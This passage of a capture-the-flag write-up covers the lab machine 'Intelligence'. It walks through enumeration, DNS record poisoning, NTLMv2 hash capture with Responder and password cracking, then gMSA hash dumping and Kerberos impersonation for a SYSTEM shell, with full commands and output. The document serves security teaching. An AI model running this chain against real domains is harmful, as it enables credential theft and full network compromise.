index: 0xf78 RID: 0x45d acb: 0x00000210 Account: Stephanie.Young Name: (null) Desc: (null)
index: 0xf8f RID: 0x474 acb: 0x00000210 Account: Ted.Graves Name: (null) Desc: (null)
index: 0xf7e RID: 0x463 acb: 0x00000210 Account: Teresa.Williamson Name: (null) Desc: (null)
index: 0xf7b RID: 0x460 acb: 0x00000210 Account: Thomas.Hall Name: (null) Desc: (null)
index: 0xf7a RID: 0x45f acb: 0x00000210 Account: Thomas.Valenzuela Name: (null) Desc: (null)
index: 0xf82 RID: 0x467 acb: 0x00000210 Account: Thomas.Wise Name: (null) Desc: (null)
index: 0xf8a RID: 0x46f acb: 0x00000210 Account: Tiffany.Molina Name: (null) Desc: (null)
index: 0xf75 RID: 0x45a acb: 0x00000210 Account: Travis.Evans Name: (null) Desc: (null)
index: 0xf83 RID: 0x468 acb: 0x00000210 Account: Veronica.Patel Name: (null) Desc: (null)
index: 0xf81 RID: 0x466 acb: 0x00000210 Account: William.Lee Name: (null) Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Danny.Matthews] rid:[0x44f]
user:[Jose.Williams] rid:[0x450]
user:[Jason.Wright] rid:[0x451]
user:[Samuel.Richardson] rid:[0x452]
user:[David.Mcbride] rid:[0x453]
user:[Scott.Scott] rid:[0x454]
user:[David.Reed] rid:[0x455]
user:[Ian.Duncan] rid:[0x456]
user:[Michelle.Kent] rid:[0x457]
user:[Jennifer.Thomas] rid:[0x458]
user:[Kaitlyn.Zimmerman] rid:[0x459]
user:[Travis.Evans] rid:[0x45a]
user:[Kelly.Long] rid:[0x45b]
user:[Nicole.Brock] rid:[0x45c]
user:[Stephanie.Young] rid:[0x45d]
user:[John.Coleman] rid:[0x45e]
user:[Thomas.Valenzuela] rid:[0x45f]
user:[Thomas.Hall] rid:[0x460]
user:[Brian.Baker] rid:[0x461]
user:[Richard.Williams] rid:[0x462]
user:[Teresa.Williamson] rid:[0x463]
user:[David.Wilson] rid:[0x464]
user:[Darryl.Harris] rid:[0x465]
user:[William.Lee] rid:[0x466]
user:[Thomas.Wise] rid:[0x467]
user:[Veronica.Patel] rid:[0x468]
user:[Joel.Crawford] rid:[0x469]
user:[Jean.Walter] rid:[0x46a]
user:[Anita.Roberts] rid:[0x46b]
user:[Brian.Morris] rid:[0x46c]
user:[Daniel.Shelton] rid:[0x46d]
user:[Jessica.Moody] rid:[0x46e]
user:[Tiffany.Molina] rid:[0x46f]
user:[James.Curbow] rid:[0x470]
user:[Jeremy.Mora] rid:[0x471]
user:[Jason.Patterson] rid:[0x472]
user:[Laura.Lee] rid:[0x473]
user:[Ted.Graves] rid:[0x474]
===============================( Share Enumeration on intelligence.htb )===============================
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on intelligence.htb
//intelligence.htb/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//intelligence.htb/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_INVALID_INFO_CLASS listing \*
//intelligence.htb/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//intelligence.htb/IT Mapping: OK Listing: OK Writing: N/A
//intelligence.htb/NETLOGON Mapping: OK Listing: OK Writing: N/A
//intelligence.htb/SYSVOL Mapping: OK Listing: OK Writing: N/A
//intelligence.htb/Users Mapping: OK Listing: OK Writing: N/A
=====================================( Groups on intelligence.htb )=====================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: Certificate Service DCOM Access' (RID: 574) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: intelligence\Domain Users
Group: Administrators' (RID: 544) has member: intelligence\Administrator
Group: Administrators' (RID: 544) has member: intelligence\Enterprise Admins
Group: Administrators' (RID: 544) has member: intelligence\Domain Admins
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: intelligence\DC$
Group: Guests' (RID: 546) has member: intelligence\Guest
Group: Guests' (RID: 546) has member: intelligence\Domain Guests
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
[+] Getting local group memberships:
Group: Cert Publishers' (RID: 517) has member: intelligence\DC$
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: intelligence\Read-only Domain Controllers
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[dba] rid:[0x475]
group:[itsupport] rid:[0x476]
group:[sysadmin] rid:[0x477]
[+] Getting domain group memberships:
Group: 'Domain Controllers' (RID: 516) has member: intelligence\DC$
Group: 'Domain Computers' (RID: 515) has member: intelligence\svc_int$
Group: 'Schema Admins' (RID: 518) has member: intelligence\Administrator
Group: 'sysadmin' (RID: 1143) has member: intelligence\Jason.Patterson
Group: 'Domain Users' (RID: 513) has member: intelligence\Administrator
Group: 'Domain Users' (RID: 513) has member: intelligence\krbtgt
Group: 'Domain Users' (RID: 513) has member: intelligence\Danny.Matthews
Group: 'Domain Users' (RID: 513) has member: intelligence\Jose.Williams
Group: 'Domain Users' (RID: 513) has member: intelligence\Jason.Wright
Group: 'Domain Users' (RID: 513) has member: intelligence\Samuel.Richardson
Group: 'Domain Users' (RID: 513) has member: intelligence\David.Mcbride
Group: 'Domain Users' (RID: 513) has member: intelligence\Scott.Scott
Group: 'Domain Users' (RID: 513) has member: intelligence\David.Reed
Group: 'Domain Users' (RID: 513) has member: intelligence\Ian.Duncan
Group: 'Domain Users' (RID: 513) has member: intelligence\Michelle.Kent
Group: 'Domain Users' (RID: 513) has member: intelligence\Jennifer.Thomas
Group: 'Domain Users' (RID: 513) has member: intelligence\Kaitlyn.Zimmerman
Group: 'Domain Users' (RID: 513) has member: intelligence\Travis.Evans
Group: 'Domain Users' (RID: 513) has member: intelligence\Kelly.Long
Group: 'Domain Users' (RID: 513) has member: intelligence\Nicole.Brock
Group: 'Domain Users' (RID: 513) has member: intelligence\Stephanie.Young
Group: 'Domain Users' (RID: 513) has member: intelligence\John.Coleman
Group: 'Domain Users' (RID: 513) has member: intelligence\Thomas.Valenzuela
Group: 'Domain Users' (RID: 513) has member: intelligence\Thomas.Hall
Group: 'Domain Users' (RID: 513) has member: intelligence\Brian.Baker
Group: 'Domain Users' (RID: 513) has member: intelligence\Richard.Williams
Group: 'Domain Users' (RID: 513) has member: intelligence\Teresa.Williamson
Group: 'Domain Users' (RID: 513) has member: intelligence\David.Wilson
Group: 'Domain Users' (RID: 513) has member: intelligence\Darryl.Harris
Group: 'Domain Users' (RID: 513) has member: intelligence\William.Lee
Group: 'Domain Users' (RID: 513) has member: intelligence\Thomas.Wise
Group: 'Domain Users' (RID: 513) has member: intelligence\Veronica.Patel
Group: 'Domain Users' (RID: 513) has member: intelligence\Joel.Crawford
Group: 'Domain Users' (RID: 513) has member: intelligence\Jean.Walter
Group: 'Domain Users' (RID: 513) has member: intelligence\Anita.Roberts
Group: 'Domain Users' (RID: 513) has member: intelligence\Brian.Morris
Group: 'Domain Users' (RID: 513) has member: intelligence\Daniel.Shelton
Group: 'Domain Users' (RID: 513) has member: intelligence\Jessica.Moody
Group: 'Domain Users' (RID: 513) has member: intelligence\Tiffany.Molina
Group: 'Domain Users' (RID: 513) has member: intelligence\James.Curbow
Group: 'Domain Users' (RID: 513) has member: intelligence\Jeremy.Mora
Group: 'Domain Users' (RID: 513) has member: intelligence\Jason.Patterson
Group: 'Domain Users' (RID: 513) has member: intelligence\Laura.Lee
Group: 'Domain Users' (RID: 513) has member: intelligence\Ted.Graves
Group: 'Domain Admins' (RID: 512) has member: intelligence\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: intelligence\Administrator
Group: 'Enterprise Admins' (RID: 519) has member: intelligence\Administrator
Group: 'itsupport' (RID: 1142) has member: intelligence\Laura.Lee
Group: 'itsupport' (RID: 1142) has member: intelligence\Ted.Graves
Group: 'dba' (RID: 1141) has member: intelligence\Jeremy.Mora
Group: 'Domain Guests' (RID: 514) has member: intelligence\Guest
enum4linux complete on Sun Aug 29 21:13:01 2021
With this data, we gained some insight into how we can gain good information once we access the victim machine. For example, along with users we also have now a domain computer and what is possibly associated with the machine logon (intelligence\svc_int$).
Gaining Access
As we saw in the last step of our enumeration, three groups look interesting: dba, itsupport, and sysadmins. And we have the following:
[+] Getting domain group memberships:
Group 'dba' (RID: 1141) has member: intelligence\Jeremy.Mora
Group 'itsupport' (RID: 1142) has member: intelligence\Laura.Lee
Group 'itsupport' (RID: 1142) has member: intelligence\Ted.Graves
Group 'sysadmin' (RID: 1143) has member: intelligence\Jason.PattersonAs we can see, we can access the IT, Users, NETLOGON, and Sysvol shares, but nothing else. Let's try Users share and see what can we access.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbclient //intelligence.htb/Users -W "intelligence.htb" -U "Tiffany.Molina%NewIntelligenceCorpUser9876"
Try "help" to get a list of possible commands.
smb: \> pwd
Current directory is \\intelligence.htb\Users\
smb: \> ls
. DR 0 Sun Apr 18 21:20:26 2021
.. DR 0 Sun Apr 18 21:20:26 2021
Administrator D 0 Sun Apr 18 20:18:39 2021
All Users DHSrn 0 Sat Sep 15 03:21:46 2018
Default DHR 0 Sun Apr 18 22:17:40 2021
Default User DHSrn 0 Sat Sep 15 03:21:46 2018
desktop.ini AHS 174 Sat Sep 15 03:11:27 2018
Public DR 0 Sun Apr 18 20:18:39 2021
Ted.Graves D 0 Sun Apr 18 21:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021
3770367 blocks of size 4096. 1442036 blocks available
smb: \> cd Tiffany.Molina
smb: \Tiffany.Molina\> ls
. D 0 Sun Apr 18 20:51:46 2021
.. D 0 Sun Apr 18 20:51:46 2021
AppData DH 0 Sun Apr 18 20:51:46 2021
Application Data DHSrn 0 Sun Apr 18 20:51:46 2021
Cookies DHSrn 0 Sun Apr 18 20:51:46 2021
Desktop DR 0 Sun Apr 18 20:51:46 2021
Documents DR 0 Sun Apr 18 20:51:46 2021
Downloads DR 0 Sat Sep 15 03:12:33 2018
Favorites DR 0 Sat Sep 15 03:12:33 2018
Links DR 0 Sat Sep 15 03:12:33 2018
Local Settings DHSrn 0 Sun Apr 18 20:51:46 2021
Music DR 0 Sat Sep 15 03:12:33 2018
My Documents DHSrn 0 Sun Apr 18 20:51:46 2021
NetHood DHSrn 0 Sun Apr 18 20:51:46 2021
NTUSER.DAT AHn 131072 Tue Jun 29 16:00:17 2021
ntuser.dat.LOG1 AHS 86016 Sun Apr 18 20:51:46 2021
ntuser.dat.LOG2 AHS 0 Sun Apr 18 20:51:46 2021
NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TM.blf AHS 65536 Sun Apr 18 20:51:46 2021
NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Sun Apr 18 20:51:46 2021
NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Sun Apr 18 20:51:46 2021
ntuser.ini AHS 20 Sun Apr 18 20:51:46 2021
Pictures DR 0 Sat Sep 15 03:12:33 2018
Recent DHSrn 0 Sun Apr 18 20:51:46 2021
Saved Games D 0 Sat Sep 15 03:12:33 2018
SendTo DHSrn 0 Sun Apr 18 20:51:46 2021
Start Menu DHSrn 0 Sun Apr 18 20:51:46 2021
Templates DHSrn 0 Sun Apr 18 20:51:46 2021
Videos DR 0 Sat Sep 15 03:12:33 2018
3770367 blocks of size 4096. 1442036 blocks available
smb: \Tiffany.Molina\> ls Desktop\
. DR 0 Sun Apr 18 20:51:46 2021
.. DR 0 Sun Apr 18 20:51:46 2021
user.txt AR 34 Sun Aug 29 06:35:26 2021
3770367 blocks of size 4096. 1442036 blocks available
smb: \Tiffany.Molina\> get Desktop\user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as Desktop\user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
And so looks like we got the user flag!
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat 'Desktop\user.txt'
492157********************a5477fAlong with this, we can tell who else to look at next...Ted.Graves, a member of itsupport.
Right from the IT share, we are able to get a powershell script:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbclient //intelligence.htb/IT -W "intelligence.htb" -U "Tiffany.Molina%NewIntelligenceCorpUser9876"
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1441236 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> quit
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat downdetector.ps1
��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
This powershell script was developed to check the availability of any sites using a domain name that start with 'web'.
At this point, I think we can use Responder while the script runs locally on the victim machine, which seems to be used periodically to validate if the site is down. For this, we will use krbrelayx's dnstool to try and create a DNS record under intelligence.htb domain.
Manipulating DNS and NTLM Hash Capture
Given that the downdetector.py script is looking for any site starting with web, we can add a DNS record like that, so we will add 'webfoo.intelligence.htb' and then validate the DNS record was created.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ python3 /opt/krbrelayx/dnstool.py -u 'intelligence.htb\Tiffany.Molina' \
-p 'NewIntelligenceCorpUser9876' -a add -r 'webfoo.intelligence.htb' \
-d 10.10.14.31 10.129.95.154
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/opt/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ dig @intelligence.htb -t any webfoo.intelligence.htb
; <<>> DiG 9.16.15-Debian <<>>@intelligence.htb webfoo.intelligence.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3892
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;webfoo.intelligence.htb. IN A
;; AUTHORITY SECTION:
intelligence.htb. 3600 IN SOA dc.intelligence.htb. hostmaster.intelligence.htb. 188 900 600 86400 3600
;; Query time: 40 msec
;; SERVER: 10.129.95.154#53(10.129.95.154)
;; WHEN: Sun Aug 29 23:38:29 EDT 2021
;; MSG SIZE rcvd: 118
On another terminal window, we run Responder and wait 5 minutes for the script to run to capture NTLM hashes when the powershell script is executed and webfoo.intelligence.htb is found:
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ sudo responder -I tun1 -i 10.10.14.31 -A
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [ON]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun1]
Responder IP [10.10.14.31]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-MJOIRCXWJLL]
Responder Domain Name [L8V7.LOCAL]
Responder DCE-RPC Port [47274]
[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.31) is not on the same subnet than the DNS server (10.35.0.1).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.31) is not on the same subnet than the DNS server (192.168.2.1).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.129.95.154
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:64c89b9435433bdf:5D84FBE3CAB9ABBDFE2EB192A9F29E13:0101000000000000E370A91E8B9DD701285ACD78B7C17CCF00000000020008004C0038005600370001001E00570049004E002D004D004A004F00490052004300580057004A004C004C00040014004C003800560037002E004C004F00430041004C0003003400570049004E002D004D004A004F00490052004300580057004A004C004C002E004C003800560037002E004C004F00430041004C00050014004C003800560037002E004C004F00430041004C0008003000300000000000000000000000002000004EFD9984637182FF871938C959F49E0B019165C48A5DD2B56826A726A26BE57B0A001000000000000000000000000000000000000900380048005400540050002F0077006500620066006F006F002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
Here we have an NTLM Hash from Ted.Graves:
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:64c89b9435433bdf:5D84FBE3CAB9ABBDFE2EB192A9F29E13:0101000000000000E370A91E8B9DD701285ACD78B7C17CCF00000000020008004C0038005600370001001E00570049004E002D004D004A004F00490052004300580057004A004C004C00040014004C003800560037002E004C004F00430041004C0003003400570049004E002D004D004A004F00490052004300580057004A004C004C002E004C003800560037002E004C004F00430041004C00050014004C003800560037002E004C004F00430041004C0008003000300000000000000000000000002000004EFD9984637182FF871938C959F49E0B019165C48A5DD2B56826A726A26BE57B0A001000000000000000000000000000000000000900380048005400540050002F0077006500620066006F006F002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
Privilege Escalation
Before proceeding, let's crack this NTLMv2 hash so we can use the password when needed.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ john --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt ted_graves.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:08 DONE (2021-08-29 23:46) 0.1118g/s 1209Kp/s 1209Kc/s 1209KC/s Mrz.browntillthedayidie..Morganstern
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Now the we have Ted.Graves password, let's try and see if we have access to the shares and what access.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbmap -H intelligence.htb -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy'
[+] IP: intelligence.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
Inspecting Permissions with BloodHound
Using 'Ted.Graves' does not give us much of a direct access to the platform, so given the LDAP information we obtained through enum4linux, we know there is more to it so let's try and gather more information through LDAP by using Bloodhound and its remote ingestor.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ bloodhound-python -d intelligence.htb -u Ted.Graves@intelligence.htb -p 'Mr.Teddy' -gc intelligence.htb -c all -ns 10.129.95.154
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The DNS query name does not exist: svc_int.intelligence.htb.
INFO: Done in 00M 08S
In Bloodhound, when using the 'Shortest Paths to Unconstrained Delegation Systems' query, we see the ITSUPPORT group can read GMSA (group managed service account) passwords. From our LDAP enumeration and BloodHound, we know 'Ted.Graves' and 'Laura.Lee' are members of this group.
Dump GSMA Service Ticket
From all the different things we can attempt at this point, we can try to dump svc_int$ passwords readable by the user by using gMSADumper and then request the Kerberos Service Ticket.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ python3 /opt/gMSADumper/gMSADumper.py -l dc.intelligence.htb -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy'
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ impacket-getST -spn dc.intelligence.htb "intelligence.htb/Ted.Graves:Mr.Teddy@intelligence.htb"
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
The information we passed to the domain controller was not sufficient as the time has to be as close as possible to the Kerberos server and we needed to specify properly the Service Principal Name.
Notice, we are attempting to impersonate the Administrator user given the 'AllowedtoDelegate' permisions svc_int$ has, as shown in the BloodHound screenshot.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ sudo ntpdate intelligence.htb
30 Aug 07:46:31 ntpdate[3415]: step time server 10.129.95.154 offset +25069.588326 sec
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ impacket-getST -spn WWW/dc.intelligence.htb "intelligence.htb/svc_int$" -hashes ":5e47bac787e5e1970cf9acdb5b316239" -dc-ip dc.intelligence.htb -impersonate administrator
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
Now that we got the service ticket, we need to have it accessible so we can gain access as administrator. In this case, we will set it as the KRB5CCNAME environment variable in our system to then use it to access the victim machine as Administrator.
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ export KRB5CCNAME=administrator.ccache
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ impacket-psexec -dc-ip dc.intelligence.htb -k "intelligence.htb/Administrator@dc.intelligence.htb" -no-pass
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WfoFBYFg.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service sGUG on dc.intelligence.htb.....
[*] Starting service sGUG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is E3EF-EBBD
Directory of c:\Users\Administrator\Desktop
04/18/2021 05:51 PM <DIR> .
04/18/2021 05:51 PM <DIR> ..
08/30/2021 03:28 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,924,732,928 bytes free
c:\Users\Administrator\Desktop>type root.txt
38418e********************42bebd
And we got the root flag!
Hope you notice how unconstrained delegation becomes a risk to an environment when the environment is not configured properly. What I mean with this is, even when the delegation is done right, if an account is given more rights than what it should have and that account gets compromised, you can move laterally by compromising another account with more privileges, compromising the rest of the environment.
Last updated
Was this helpful?